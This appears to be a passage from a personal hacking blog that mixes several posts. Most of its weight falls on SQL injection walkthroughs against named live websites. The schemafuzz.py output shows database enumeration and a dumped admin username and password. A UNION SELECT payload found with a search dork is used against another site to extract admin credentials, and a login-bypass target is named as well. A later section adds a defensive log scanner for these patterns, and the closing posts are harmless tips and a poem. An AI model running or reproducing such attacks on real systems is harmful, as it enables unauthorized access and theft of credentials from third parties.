Favorite add-ons

- Pray Times! 1.1.3, download here
- Kaskus Menu 2.5.2, download here
- Adblock Plus 1.1, download here
- DownThemAll 1.1.4, download here
- HackBar 1.4.2, download here

APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

Following the milw0rm website, I found one target at www.letsdancedisco.de/apbook/index.php; change it to www.letsdancedisco.de/apbook/admin/index.php, then fill in the username & password using that SQL injection technique. You are now admin.

There are many more targets that can be injected :D

[POC] Schemafuzz.py

Software:
- Windows OS
- Mozilla browser
- Python 2.5 (download here)
- Schemafuzz.py (download here)

Target : http://justclone.com/alibabaclone/category.php?IndustryID=44

POC:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
C:\Python25>schemafuzz.py --findcol -u http://justclone.com/alibabaclone/category.php?IndustryID=44--

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44--
[+] Evasion Used: "+" "--"
[+] 13:31:32
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,
[+] Column Length is: 2
[+] Found null column at column #: 1
[+] SQLi URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,1--
[+] darkc0de URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de
[-] Done!

C:\Python25>schemafuzz.py --dbs -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:34:31
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0]justclo_alibaba

[-] [13:34:35]
[-] Total URL Requests 3
[-] Done

C:\Python25>schemafuzz.py --schema -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:37:08
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing Tables & Columns from database "justclo_alibaba"
[+] Number of Tables: 60

[-] [13:49:10]
[-] Total URL Requests 580
[-] Done

C:\Python25>schemafuzz.py --dump -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba -T admin -C LoginID,Password

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:03:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Dumping data from database "justclo_alibaba" Table "admin"
[+] Column(s) ['LoginID', 'Password']
[+] Number of Rows: 1

[0] admin:admin123:admin123:

[-] [14:03:15]
[-] Total URL Requests 3
[-] Done

Bye bye milw0rm

Perhaps the die-hard fans of milw0rm (myself included :)) already know that milw0rm has been declared to be closing. The reason can perhaps be seen in this news item, although several rumors are circulating that there is another reason behind all this that forced str0ke to close milw0rm. However, judging from str0ke's Twitter, it seems there may be good news about milw0rm, we'll see.

Perhaps it is time to look for another alternative?! packetstormsecurity and securityfocus still provide an archive of exploits, tools, and POCs every month, or perhaps it is time for this site to get more hits, especially from those who miss the atmosphere of milw0rm.

source:
- Kecoak elektronik

[POC] Expert Advisior SQL Injection Vulnerability

Wandering over to Jatim for fun, I came back with a souvenir:

AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: intitle:"Answer Builder" Ask a question
DESCRIPTION:
pull out admin user/pass from the database
EXPLOITS:
http://server.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*
NOTE/TIP:
admin login is at /admin/ you can backup DB there.

Then I tried hunting for the bug here by entering the dork; a few seconds later I got one website that looks SQL-injectable. Here is the site: http://www.rotorheads.co.uk/index.php?cmd=4&id=1. Following the instructions above, I then extended it to:

http://www.rotorheads.co.uk/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat%280x3c623e,username,0x3a,password,0x3c623e%29,9,10,11,12,13,14,15/**/FROM/**/admin/*

Can you see the password? :)
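
A log-side check for the request patterns shown in the two POCs above, as an added example that is not part of the original post or of schemafuzz.py: it undoes the "+" and /**/ spacing and the %xx encoding, then matches UNION SELECT, AND 1=2 and information_schema. The log lines, IP addresses, and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IP ranges, example paths); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:13:31:32 +0000] "GET /category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,1-- HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:13:37:09 +0000] "GET /category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,table_name+FROM+information_schema.tables-- HTTP/1.1" 200 530
198.51.100.9 - - [01/Jan/2024:13:40:00 +0000] "GET /index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,concat%280x3c623e,username%29/**/FROM/**/admin/* HTTP/1.1" 200 900
192.0.2.15 - - [01/Jan/2024:13:41:00 +0000] "GET /category.php?IndustryID=44 HTTP/1.1" 200 4096
192.0.2.15 - - [01/Jan/2024:13:42:00 +0000] "GET /search.php?q=student+union+and+select+committee HTTP/1.1" 200 2048
"""

# Client IP and request target from a common/combined log format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Patterns taken from the requests shown on this page, applied after normalization.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "and_1_eq_2": re.compile(r"\band\s+1\s*=\s*2\b"),
}

def normalize(target):
    """Undo the spacing evasions: '+' and %xx encoding, /**/ used as whitespace."""
    query = target.partition("?")[2]
    text = unquote_plus(query).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)      # inline SQL comments become spaces
    return re.sub(r"\s+", " ", text)

def scan(log_text):
    """Return {client_ip: Counter(signature -> hits)} for matching requests."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                             # skip lines in another format
        ip, target = m.groups()
        text = normalize(target)
        for name, rx in SIGNATURES.items():
            if rx.search(text):
                hits.setdefault(ip, Counter())[name] += 1
    return hits

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, dict(counts))
```

The benign search containing the words "union" and "select" is not flagged, because the match requires the two keywords to be adjacent after normalization.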

Printer disappeared

Suddenly the list in Printers & Faxes disappeared when I was about to print. Why? I tried re-adding the printer on the office network but couldn't; instead an error appeared: "Operation could not be completed". Hm... what's going on? I tried restoring the Windows XP OS, which failed. I asked uncle Google and finally got an answer. Let's try,

first method:
- click Start, go to Run
- type "net start spooler", without the quotation marks
or the second method:
- Click Start, then click Control Panel.
- Double-click Administrative Tools, then click Services.
- Double-click the Printer Spooler service, then change the startup type to Automatic. This makes the Spooler service start automatically when the computer restarts.
source: Microsoft

FBI software

This is a set of 11 useful software packages, also used by the FBI to examine and analyze other computers that have been hacked. Most of these programs do not need to be installed because they are portable ...

The software includes:
- ADS Locator (Alternate Data Streams)
- Disc Investigator 1.4 (File-Slack-Analyze)
- Historian 1.4 (Browser Analyze)
- Live View 0.6 (System Analyze)
- MUI Cacheview 1.00 (Registry Analyze)
- Networkminer 0.85 (Network Analyze)
- Regripper 2.02 (Registry Analyze)
- Systemreport 2.54 (PC Analyze)
- USB-History R1 (USB-Stick-Analyze)
- Windows File Analyzer (File Analyze)
- Winpcap 4.02 (Network)

You can download it here or here or here

Utekbuntu

For some reason I want to write this sentence:

I wipe away tears in sorrow, I close my eyes in sorrow, I cast my body into the elegy of your love, and I spread my soul in the spirit of eternity..


